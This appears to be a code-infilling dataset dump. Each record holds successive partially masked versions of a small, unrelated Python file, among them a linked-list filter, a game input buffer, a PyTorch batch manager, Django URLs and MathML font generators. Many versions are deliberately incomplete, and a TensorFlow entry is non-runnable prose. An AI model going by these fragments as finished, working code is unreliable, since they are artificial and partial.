print(replace_network('CfHl.Subnet.Public0',{'EnvironmentName':'dev'}))
print(replace_network('CfHl.Vpc.Id',{'EnvironmentName':'dev'}))
| [
5,
8,
9,
10,
11
] |
66 | efcbe296ea72a94be967124a8ba8c84a524e2eb1 | <mask token>
| <mask token>
def filter_pos_rec(lst):
"""
@type lst: LinkedListRec
>>> lst = LinkedListRec([3, -10, 4, 0])
>>> pos = filter_pos_rec(lst)
>>> str(pos)
'3 -> 4'
"""
if lst.is_empty():
return lst
else:
pos_rec = LinkedListRec([])
if lst._first > 0:
pos_rec._first = lst._first
pos_rec._rest = filter_pos_rec(lst._rest)
else:
pos_rec = filter_pos_rec(lst._rest)
return pos_rec
| __author__ = 'AChen'
<mask token>
def filter_pos_rec(lst):
"""
@type lst: LinkedListRec
>>> lst = LinkedListRec([3, -10, 4, 0])
>>> pos = filter_pos_rec(lst)
>>> str(pos)
'3 -> 4'
"""
if lst.is_empty():
return lst
else:
pos_rec = LinkedListRec([])
if lst._first > 0:
pos_rec._first = lst._first
pos_rec._rest = filter_pos_rec(lst._rest)
else:
pos_rec = filter_pos_rec(lst._rest)
return pos_rec
| __author__ = 'AChen'
from rec_linked_list import *
def filter_pos_rec(lst):
"""
@type lst: LinkedListRec
>>> lst = LinkedListRec([3, -10, 4, 0])
>>> pos = filter_pos_rec(lst)
>>> str(pos)
'3 -> 4'
"""
if lst.is_empty():
return lst
else:
pos_rec = LinkedListRec([])
if lst._first > 0:
pos_rec._first = lst._first
pos_rec._rest = filter_pos_rec(lst._rest)
else:
pos_rec = filter_pos_rec(lst._rest)
return pos_rec
| __author__ = 'AChen'
from rec_linked_list import *
def filter_pos_rec(lst):
"""
@type lst: LinkedListRec
>>> lst = LinkedListRec([3, -10, 4, 0])
>>> pos = filter_pos_rec(lst)
>>> str(pos)
'3 -> 4'
"""
if lst.is_empty():
return lst
else:
pos_rec = LinkedListRec([])
if lst._first > 0:
pos_rec._first = lst._first
pos_rec._rest = filter_pos_rec(lst._rest)
else:
pos_rec = filter_pos_rec(lst._rest)
return pos_rec
| [
0,
1,
2,
3,
4
] |
67 | 4789546128263bd298f8f5827734f8402747b9ac | <mask token>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
| <mask token>
class InputBuffer:
<mask token>
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
<mask token>
def __str__(self):
return f'{self._inputs}'
<mask token>
@property
def values(self) ->list:
return self._inputs.values()
<mask token>
<mask token>
<mask token>
<mask token>
def clear(self):
self._inputs.clear()
<mask token>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
| <mask token>
class InputBuffer:
<mask token>
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f'{self._inputs}'
def __repr__(self):
return f'{self._inputs}'
@property
def values(self) ->list:
return self._inputs.values()
<mask token>
def get_inputs(self) ->dict:
return self._inputs
def get_frame_inputs(self, frame: int) ->list:
return self._inputs.get(frame, [])
def is_empty(self) ->bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
<mask token>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
| <mask token>
class InputBuffer:
"""
Responsible for collecting game input from both players. The game state will pull data from here if needed.
Network messages will also update the input buffer when receiving data from the opposite player
"""
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f'{self._inputs}'
def __repr__(self):
return f'{self._inputs}'
@property
def values(self) ->list:
return self._inputs.values()
def add_input(self, input, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input.value)
else:
self._inputs[frame] = [input.value]
def get_inputs(self) ->dict:
return self._inputs
def get_frame_inputs(self, frame: int) ->list:
return self._inputs.get(frame, [])
def is_empty(self) ->bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
def poll_client_inputs(self, frame: int) ->None:
if Input.is_action_pressed(action_name=self.left_action_name):
self.add_input(input=InputBuffer.Value.LEFT, frame=frame)
elif Input.is_action_pressed(action_name=self.right_action_name):
self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)
if Input.is_action_pressed(action_name=self.weak_punch_action_name):
self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)
self._inputs.pop(frame - self._frame_limit, None)
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
| from enum import Enum
from roll.input import Input
from roll.network import Server, Client
from assets.game_projects.fighter.src.game_properties import GameProperties
from assets.game_projects.fighter.src.network_message import NetworkMessage
class InputBuffer:
"""
Responsible for collecting game input from both players. The game state will pull data from here if needed.
Network messages will also update the input buffer when receiving data from the opposite player
"""
class Value(Enum):
LEFT = "l"
RIGHT = "r"
UP = "u"
DOWN = "d"
WEAK_PUNCH = "wp"
def __init__(
self,
left_action_name: str,
right_action_name: str,
weak_punch_action_name: str,
frame_limit=12,
):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f"{self._inputs}"
def __repr__(self):
return f"{self._inputs}"
@property
def values(self) -> list:
return self._inputs.values()
def add_input(self, input, frame: int) -> None:
if frame in self._inputs:
self._inputs[frame].append(input.value)
else:
self._inputs[frame] = [input.value]
def get_inputs(self) -> dict:
return self._inputs
def get_frame_inputs(self, frame: int) -> list:
return self._inputs.get(frame, [])
def is_empty(self) -> bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
def poll_client_inputs(self, frame: int) -> None:
if Input.is_action_pressed(action_name=self.left_action_name):
self.add_input(input=InputBuffer.Value.LEFT, frame=frame)
elif Input.is_action_pressed(action_name=self.right_action_name):
self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)
if Input.is_action_pressed(action_name=self.weak_punch_action_name):
self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)
self._inputs.pop(frame - self._frame_limit, None)
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(
self,
left_action_name: str,
right_action_name: str,
weak_punch_action_name: str,
frame_limit=12,
):
super().__init__(
left_action_name=left_action_name,
right_action_name=right_action_name,
weak_punch_action_name=weak_punch_action_name,
frame_limit=frame_limit,
)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) -> None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(
message=f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}"
)
else:
Client.send_message_to_server(
message=f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}"
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(
left_action_name="",
right_action_name="",
weak_punch_action_name="",
frame_limit=frame_limit,
)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) -> None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) -> None:
# TODO: Proper prediction
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
| [
7,
11,
16,
19,
21
] |
68 | b693cc63e2ee4c994ef7b5e44faea99f15a021f6 | <mask token>
class QManeger(object):
def __init__(self, opt, q_trace, q_batch):
self.traces_s = []
self.traces_a = []
self.traces_r = []
self.lock = mp.Lock()
self.q_trace = q_trace
self.q_batch = q_batch
self.opt = opt
self.device = torch.device('cuda' if torch.cuda.is_available() else
'cpu')
<mask token>
def listening(self):
while True:
traces = self.q_trace.get(block=True)
for s, a, r in zip(traces[0], traces[1], traces[2]):
self._push_one(s, a, r)
if len(self.traces_s) > self.opt.batch_size:
self.produce_batch()
<mask token>
| <mask token>
class QManeger(object):
def __init__(self, opt, q_trace, q_batch):
self.traces_s = []
self.traces_a = []
self.traces_r = []
self.lock = mp.Lock()
self.q_trace = q_trace
self.q_batch = q_batch
self.opt = opt
self.device = torch.device('cuda' if torch.cuda.is_available() else
'cpu')
<mask token>
def listening(self):
while True:
traces = self.q_trace.get(block=True)
for s, a, r in zip(traces[0], traces[1], traces[2]):
self._push_one(s, a, r)
if len(self.traces_s) > self.opt.batch_size:
self.produce_batch()
def produce_batch(self):
batch_size = self.opt.batch_size
res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:
batch_size], self.traces_r[:batch_size]
del self.traces_s[:batch_size]
del self.traces_a[:batch_size]
del self.traces_r[:batch_size]
res_s = torch.FloatTensor(res_s).to(self.device)
res_a = torch.LongTensor(res_a).to(self.device)
res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)
self.q_batch.put((res_s, res_a, res_r))
| <mask token>
class QManeger(object):
def __init__(self, opt, q_trace, q_batch):
self.traces_s = []
self.traces_a = []
self.traces_r = []
self.lock = mp.Lock()
self.q_trace = q_trace
self.q_batch = q_batch
self.opt = opt
self.device = torch.device('cuda' if torch.cuda.is_available() else
'cpu')
def _push_one(self, state, action, reward):
self.traces_s.append(state)
self.traces_a.append(action)
self.traces_r.append(reward)
def listening(self):
while True:
traces = self.q_trace.get(block=True)
for s, a, r in zip(traces[0], traces[1], traces[2]):
self._push_one(s, a, r)
if len(self.traces_s) > self.opt.batch_size:
self.produce_batch()
def produce_batch(self):
batch_size = self.opt.batch_size
res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:
batch_size], self.traces_r[:batch_size]
del self.traces_s[:batch_size]
del self.traces_a[:batch_size]
del self.traces_r[:batch_size]
res_s = torch.FloatTensor(res_s).to(self.device)
res_a = torch.LongTensor(res_a).to(self.device)
res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)
self.q_batch.put((res_s, res_a, res_r))
| import torch
import torch.multiprocessing as mp
import random
class QManeger(object):
def __init__(self, opt, q_trace, q_batch):
self.traces_s = []
self.traces_a = []
self.traces_r = []
self.lock = mp.Lock()
self.q_trace = q_trace
self.q_batch = q_batch
self.opt = opt
self.device = torch.device('cuda' if torch.cuda.is_available() else
'cpu')
def _push_one(self, state, action, reward):
self.traces_s.append(state)
self.traces_a.append(action)
self.traces_r.append(reward)
def listening(self):
while True:
traces = self.q_trace.get(block=True)
for s, a, r in zip(traces[0], traces[1], traces[2]):
self._push_one(s, a, r)
if len(self.traces_s) > self.opt.batch_size:
self.produce_batch()
def produce_batch(self):
batch_size = self.opt.batch_size
res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:
batch_size], self.traces_r[:batch_size]
del self.traces_s[:batch_size]
del self.traces_a[:batch_size]
del self.traces_r[:batch_size]
res_s = torch.FloatTensor(res_s).to(self.device)
res_a = torch.LongTensor(res_a).to(self.device)
res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)
self.q_batch.put((res_s, res_a, res_r))
| import torch
import torch.multiprocessing as mp
import random
class QManeger(object):
def __init__(self, opt, q_trace, q_batch):
self.traces_s = []
self.traces_a = []
self.traces_r = []
self.lock = mp.Lock()
self.q_trace = q_trace
self.q_batch = q_batch
self.opt = opt
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def _push_one(self, state, action, reward):
self.traces_s.append(state)
self.traces_a.append(action)
self.traces_r.append(reward)
def listening(self):
while True:
traces = self.q_trace.get(block=True)
for s, a, r in zip(traces[0], traces[1], traces[2]):
self._push_one(s, a, r)
if len(self.traces_s) > self.opt.batch_size:
self.produce_batch()
def produce_batch(self):
batch_size = self.opt.batch_size
res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:batch_size], \
self.traces_r[:batch_size]
# delete
del self.traces_s[:batch_size]
del self.traces_a[:batch_size]
del self.traces_r[:batch_size]
res_s = torch.FloatTensor(res_s).to(self.device)
res_a = torch.LongTensor(res_a).to(self.device)
res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)
# stack batch and put
self.q_batch.put((res_s, res_a, res_r))
| [
3,
4,
5,
6,
7
] |
69 | 3c0beb7be29953ca2d7b390627305f4541b56efa | <mask token>
def test_main_cnv():
main_cnv(tarfile)
<mask token>
| <mask token>
sys.path.append('../circos_report/cnv_anno2conf')
<mask token>
def test_main_cnv():
main_cnv(tarfile)
if __name__ == '__main__':
test_main_cnv()
| <mask token>
sys.path.append('../circos_report/cnv_anno2conf')
<mask token>
tarfile = {'yaml': 'data/test_app.yaml'}
def test_main_cnv():
main_cnv(tarfile)
if __name__ == '__main__':
test_main_cnv()
| import sys
sys.path.append('../circos_report/cnv_anno2conf')
from cnv_anno2conf import main_cnv
tarfile = {'yaml': 'data/test_app.yaml'}
def test_main_cnv():
main_cnv(tarfile)
if __name__ == '__main__':
test_main_cnv()
| import sys
sys.path.append("../circos_report/cnv_anno2conf")
from cnv_anno2conf import main_cnv
tarfile = {"yaml": "data/test_app.yaml"}
def test_main_cnv():
main_cnv(tarfile)
if __name__ == "__main__":
test_main_cnv()
| [
1,
2,
3,
4,
5
] |
70 | 8d0fcf0bf5effec9aa04e7cd56b4b7098c6713cb | <mask token>
| for i in range(-10, 0):
print(i, end=' ')
| for i in range(-10,0):
print(i,end=" ") | null | null | [
0,
1,
2
] |
71 | a14114f9bb677601e6d75a72b84ec128fc9bbe61 | <mask token>
| <mask token>
urlpatterns = [path('admin/', admin.site.urls), path('api/', include(
'api.urls')), path('api/adv/', include('adventure.urls'))]
| from django.contrib import admin
from django.urls import path, include, re_path
from django.conf.urls import include
from rest_framework.authtoken import views
urlpatterns = [path('admin/', admin.site.urls), path('api/', include(
'api.urls')), path('api/adv/', include('adventure.urls'))]
| from django.contrib import admin
from django.urls import path, include, re_path
from django.conf.urls import include
# from rest_framework import routers
from rest_framework.authtoken import views
# from adventure.api import PlayerViewSet, RoomViewSet
# from adventure.api import move
# router = routers.DefaultRouter()
# router.register('rooms', RoomViewSet)
# router.register('currentRoom', PlayerViewSet)
urlpatterns = [
path('admin/', admin.site.urls),
path('api/', include('api.urls')),
path('api/adv/', include('adventure.urls')),
# path('api-token-auth', views.obtain_auth_token)
]
| null | [
0,
1,
2,
3
] |
72 | edb206a8cd5bc48e831142d5632fd7eb90abd209 | import tensorflow as tf
optimizer = tf.train.GradientDescentOptimizer(0.001).minimize(loss)
_, l = sess.run([optimizer, loss], feed_dict={X:x, Y:y})
Session looks at all trainable variables that loss depends on and update them
tf.Variable(initializer=None, trainable=True, collections=None, validate_shape=True, caching_device=None,
name=None, variable_def=None, dtype=None, expected_shape=None, import_scope=None)
List of optimizers in TF
1. tf.train.GradientDescentOptimizer
2. tf.train.AdagradOptimizer
3. tf.train.MomentumOptimizer
4. tf.train.AdamOptimizer
5. tf.train.ProximalGradientDescentOptimizer
6. tf.train.ProximalAdagradOptimizer
7. tf.train.RMSPropOptimizer
And more | null | null | null | null | [
0
] |
73 | 36991c3191ba48b1b9dbd843e279f8fe124f1339 | <mask token>
class Rouge(Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass
<mask token>
<mask token>
def regen_resource(self):
pass
def full_resource(self):
pass
| <mask token>
class Rouge(Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass
def special_attack2(self, opponent, hitdamage_callback, specatt_callback):
pass
def heal(self, target):
pass
def regen_resource(self):
pass
def full_resource(self):
pass
| __author__ = 'Jager'
<mask token>
class Rouge(Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass
def special_attack2(self, opponent, hitdamage_callback, specatt_callback):
pass
def heal(self, target):
pass
def regen_resource(self):
pass
def full_resource(self):
pass
| __author__ = 'Jager'
from char import Character
class Rouge(Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass
def special_attack2(self, opponent, hitdamage_callback, specatt_callback):
pass
def heal(self, target):
pass
def regen_resource(self):
pass
def full_resource(self):
pass
| __author__ = 'Jager'
from char import Character
class Rouge (Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass # hook method
def special_attack2(self, opponent, hitdamage_callback, specatt_callback):
pass # hook method
def heal(self, target):
pass # hook method
def regen_resource(self):
pass # hook method
def full_resource(self):
pass | [
4,
6,
7,
8,
9
] |
74 | 0de657ee173b606ad61d614a6168c00fcd571a70 | <mask token>
| <mask token>
def test_convert_nc_2010_to_na_2310():
ffi_in, ffi_out = 2010, 2310
infile = os.path.join(cached_outputs, f'{ffi_in}.nc')
outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')
x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)
x.writeNAFiles(outfile, delimiter=',', float_format='%g')
| import os
from .common import cached_outputs, data_files, test_outputs
import nappy.nc_interface.na_to_nc
import nappy.nc_interface.nc_to_na
def test_convert_nc_2010_to_na_2310():
ffi_in, ffi_out = 2010, 2310
infile = os.path.join(cached_outputs, f'{ffi_in}.nc')
outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')
x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)
x.writeNAFiles(outfile, delimiter=',', float_format='%g')
| import os
from .common import cached_outputs, data_files, test_outputs
import nappy.nc_interface.na_to_nc
import nappy.nc_interface.nc_to_na
def test_convert_nc_2010_to_na_2310():
ffi_in, ffi_out = (2010, 2310)
infile = os.path.join(cached_outputs, f"{ffi_in}.nc")
outfile = os.path.join(test_outputs, f"{ffi_out}_from_nc_{ffi_in}.na")
# Reading: infile
x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)
# Writing: outfile
x.writeNAFiles(outfile, delimiter=",", float_format="%g")
| null | [
0,
1,
2,
3
] |
75 | 06638b361c1cbe92660d242969590dfa45b63a4d | <mask token>
| <mask token>
mathfont.save(f)
<mask token>
mathfont.save(f)
<mask token>
mathfont.save(f)
<mask token>
mathfont.save(f)
<mask token>
mathfont.save(f)
<mask token>
mathfont.save(f)
| <mask token>
v1 = 5 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-bottomdisplaystyleshiftdown%d-axisheight%d' % (
v1, v2), 'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = v1
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 6 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-bottomshiftdown%d-axisheight%d' % (v1, v2),
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = v1
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 4 * mathfont.em
f = mathfont.create('stack-displaystylegapmin%d' % v,
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = v
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 8 * mathfont.em
f = mathfont.create('stack-gapmin%d' % v,
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = v
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 3 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-topdisplaystyleshiftup%d-axisheight%d' % (v1, v2
), 'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = v1
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 9 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-topshiftup%d-axisheight%d' % (v1, v2),
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = v1
mathfont.save(f)
| from utils import mathfont
import fontforge
v1 = 5 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-bottomdisplaystyleshiftdown%d-axisheight%d' % (
v1, v2), 'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = v1
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 6 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-bottomshiftdown%d-axisheight%d' % (v1, v2),
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = v1
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 4 * mathfont.em
f = mathfont.create('stack-displaystylegapmin%d' % v,
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = v
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 8 * mathfont.em
f = mathfont.create('stack-gapmin%d' % v,
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = v
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 3 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-topdisplaystyleshiftup%d-axisheight%d' % (v1, v2
), 'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = v1
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 9 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-topshiftup%d-axisheight%d' % (v1, v2),
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = v1
mathfont.save(f)
| #!/usr/bin/env python3
from utils import mathfont
import fontforge
v1 = 5 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create("stack-bottomdisplaystyleshiftdown%d-axisheight%d" % (v1, v2),
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = v1
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 6 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create("stack-bottomshiftdown%d-axisheight%d" % (v1, v2),
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = v1
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 4 * mathfont.em
f = mathfont.create("stack-displaystylegapmin%d" % v,
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = v
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 8 * mathfont.em
f = mathfont.create("stack-gapmin%d" % v,
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = 0
